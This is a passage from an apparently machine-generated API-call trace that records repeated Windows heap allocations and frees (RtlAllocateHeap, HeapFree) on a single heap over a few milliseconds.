0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: 